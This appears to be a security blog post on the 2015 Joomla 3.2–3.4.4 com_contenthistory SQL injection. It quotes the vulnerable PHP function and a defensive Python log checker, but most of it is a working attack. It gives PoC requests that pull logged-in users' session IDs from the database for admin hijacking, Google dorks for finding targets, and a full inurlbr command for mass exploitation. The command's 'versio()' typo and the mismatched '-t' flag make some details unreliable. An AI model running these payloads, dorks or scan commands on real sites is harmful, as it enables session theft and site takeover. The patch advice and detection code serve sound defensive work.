A Joomla CMS vulnerability that affects more than 2.8 million sites.
Joomla is probably one of the most widely used web content management systems (CMS) for building enterprise-level websites, and it is also widely used for personal websites.
It is open-source software under the GNU/GPL license, maintained by a community of developers organized as a non-profit (Joomla.org).
According to Trustwave, Joomla CMS versions 3.2 to 3.4.4 have a serious security flaw that enables SQL injection attacks, allowing attackers to "win" administrator privileges on the platform.
Trustwave SpiderLabs researcher Asaf Orpani has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (CMS). Combining that vulnerability with other security weaknesses, our Trustwave SpiderLabs researchers are able to gain full administrative access to any vulnerable Joomla site.
Joomla had a 6.6 percent share of the market for website CMSs as of October 20, 2015 according to W3Techs—second only to WordPress. Internet services company BuiltWith estimates that as many as 2.8 million websites worldwide use Joomla.
CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it.
CVE-2015-7857 enables an unauthorized remote user to gain administrator privileges by hijacking the administrator session. Following exploitation of the vulnerability, the attacker may gain full control of the web site and execute additional attacks.
The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4.
Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable.
Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research.
Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5.
UPDATE:
https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html
The following code snippet was found to be vulnerable to SQLi:
FILE: /administrator/components/com_contenthistory/models/history.php
FULL FUNCTION:
```php
/**
 * Build an SQL query to load the list data.
 *
 * @return  JDatabaseQuery
 *
 * @since   3.2
 */
protected function getListQuery()
{
    // Create a new query object.
    $db    = $this->getDbo();
    $query = $db->getQuery(true);

    // Select the required fields from the table.
    // list.select, item_id and type_id come from request state and are
    // concatenated into the query without quoting or validation.
    $query->select(
        $this->getState(
            'list.select',
            'h.version_id, h.ucm_item_id, h.ucm_type_id, h.version_note, h.save_date, h.editor_user_id,' .
            'h.character_count, h.sha1_hash, h.version_data, h.keep_forever'
        )
    )
    ->from($db->quoteName('#__ucm_history') . ' AS h')
    ->where($db->quoteName('h.ucm_item_id') . ' = ' . $this->getState('item_id'))
    ->where($db->quoteName('h.ucm_type_id') . ' = ' . $this->getState('type_id'))

    // Join over the users for the editor
    ->select('uc.name AS editor')
    ->join('LEFT', '#__users AS uc ON uc.id = h.editor_user_id');

    // Add the list ordering clause (list.ordering / list.direction are also request state).
    $orderCol  = $this->state->get('list.ordering');
    $orderDirn = $this->state->get('list.direction');
    $query->order($db->quoteName($orderCol) . $orderDirn);

    return $query;
}
```
http://pastebin.com/9FnPuns5
PoC:
GET REQUEST:
http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
With this query it is possible to extract the session IDs (cookies) of users currently logged into the system and set them in your own browser.
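As an added example (not code from this page, Joomla or Trustwave), the following Python replays the input path of getListQuery() above against a request URL, enforcing the allow-list of column names the snippet itself selects, and then runs that check over constructed access-log lines, one of which is shaped like the PoC; the allow-list is an assumption derived from the snippet, not Joomla's actual 3.4.5 fix.

```python
"""Defensive check for the com_contenthistory request pattern shown above.
Replays the getListQuery() input path (list[select], list[ordering] and
list[direction] spliced into SQL) and enforces an allow-list of the column
names the snippet selects (an assumption for this example, not Joomla's patch)."""
import re
from urllib.parse import parse_qs, urlsplit

# Column names that getListQuery() legitimately puts in SELECT / ORDER BY.
ALLOWED_COLUMNS = {
    "h.version_id", "h.ucm_item_id", "h.ucm_type_id", "h.version_note",
    "h.save_date", "h.editor_user_id", "h.character_count", "h.sha1_hash",
    "h.version_data", "h.keep_forever",
}
ALLOWED_DIRECTION = {"", "asc", "desc"}
# Combined-format access log: only the request target is needed here.
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[0-9.]+"')

# Constructed sample log lines (not real traffic): a normal history view,
# then a request shaped like the PoC above.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Oct/2015:10:00:01 +0000] "GET /index.php?option=com_contenthistory&view=history&item_id=75&type_id=1&list%5Bordering%5D=h.save_date&list%5Bdirection%5D=DESC HTTP/1.1" 200 812',
    '203.0.113.9 - - [22/Oct/2015:10:00:02 +0000] "GET /index.php?option=com_contenthistory&view=history&item_id=75&type_id=1&list%5Bselect%5D=1+AND+(SELECT+5030+FROM(SELECT+COUNT(*),CONCAT(0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a) HTTP/1.1" 500 1410',
]

def check_query(url: str) -> list:
    """Reasons a com_contenthistory request is suspicious ([] == clean);
    requests for other components are ignored."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if qs.get("option", [""])[0] != "com_contenthistory":
        return []
    reasons = []
    for key in ("list[select]", "list[ordering]"):
        for raw in qs.get(key, []):
            # A legitimate value is a comma-separated list of known columns.
            for col in (c.strip() for c in raw.split(",") if c.strip()):
                if col not in ALLOWED_COLUMNS:
                    reasons.append(f"{key}: unexpected token {col[:30]!r}")
    for raw in qs.get("list[direction]", []):
        if raw.strip().lower() not in ALLOWED_DIRECTION:
            reasons.append(f"list[direction]: unexpected token {raw[:30]!r}")
    return reasons

def scan_log(lines) -> list:
    """Run check_query() over access-log lines; return (line_no, reasons) hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if m and (reasons := check_query(m.group(1))):
            hits.append((n, reasons))
    return hits
```

The same allow-list check, applied in the model before the state is concatenated, is the kind of validation the vulnerable getListQuery() lacks.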
Video demonstration:
In this article we will work through the SQLi exploitation.
REQUEST RESPONSE - Example exploitation:
URL:
http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1+AND+(SELECT+5030+FROM(SELECT+COUNT(*),CONCAT(0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)
REQUEST OUTPUT (screenshot):
Base validation:
HEX ENCODING OF the marker " :INURLBR: " (including the surrounding spaces and colons)
RESULT = 0x203a494e55524c42523a20
INJECT: 0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20....
The marker is concatenated on both sides of version() so that the injected value can be recognised in the response.
DORK:
- components/com_contenthistory/
- inurl:com_contenthistory
- index.php?option=com_contenthistory
- "index of" components/com_contenthistory/
- inurl:"components/com_contenthistory/"
- inurl:"index.php?option=com_contenthistory"
Using inurlbr scanner for mass exploitation:
Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command
SET DORK:
--dork 'YOUR_DORK'
OR
--dork-file 'YOUR_DORK_FILE.txt'
SET SEARCH ENGINES:
-q all
We will use all the search engines available in the script.
SET OUTPUT FILE:
-s com_contenthistory.txt
SET VALIDATION TYPE:
-t 2
Type 2 tries to validate the error string defined by: -a 'VALUE_INSIDE_THE_TARGET'
It also sends the exploit to the target through the GET method.
Before setting the exploit we manipulate its string: an internal function of the inurlbr scanner is used to pass a validation string inside the SQL injection, so that vulnerable targets can be separated from the rest.
Internal function - converting strings to hexadecimal
hex: encodes a value in hex.
Example: hex({value})
Usage: hex(102030)
Usage: --exploit-get 'user?id=hex(102030)'
Resulting injected URL:
http://www.target.localhost.br/user?id=313032303330
--exploit-get '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))'
hex(INURLBR) = 494e55524c4252
Example injection:
http://www.target.localhost.br/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))
SET STRING VALIDATION:
Specify the string that the script will search for in the response:
Example: -a {string}
Usage: -a '<title>hello world</title>'
If the specified value is found in the target's response, the target is considered vulnerable.
Setting: -a 'INURLBR'
SET FILTER RESULTS:
--unique
Filters results to unique domains and strips the GET parameters from each URL.
We validate on the string "INURLBR" that was passed inside the SQLi exploit: if that value appears in the target's response, the injection succeeded.
COMMAND FULL:
php inurlbr.php --dork 'inurl:"/components/com_contenthistory"' -s com_contenthistory.txt --exploit-get '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))' -t 3 -a 'INURLBR' --unique
Execution return:
SOLUTION: Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5.
UPDATE:
https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html
Source INFO-1-> https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0
Source INFO-2-> https://cxsecurity.com/issue/WLB-2015100146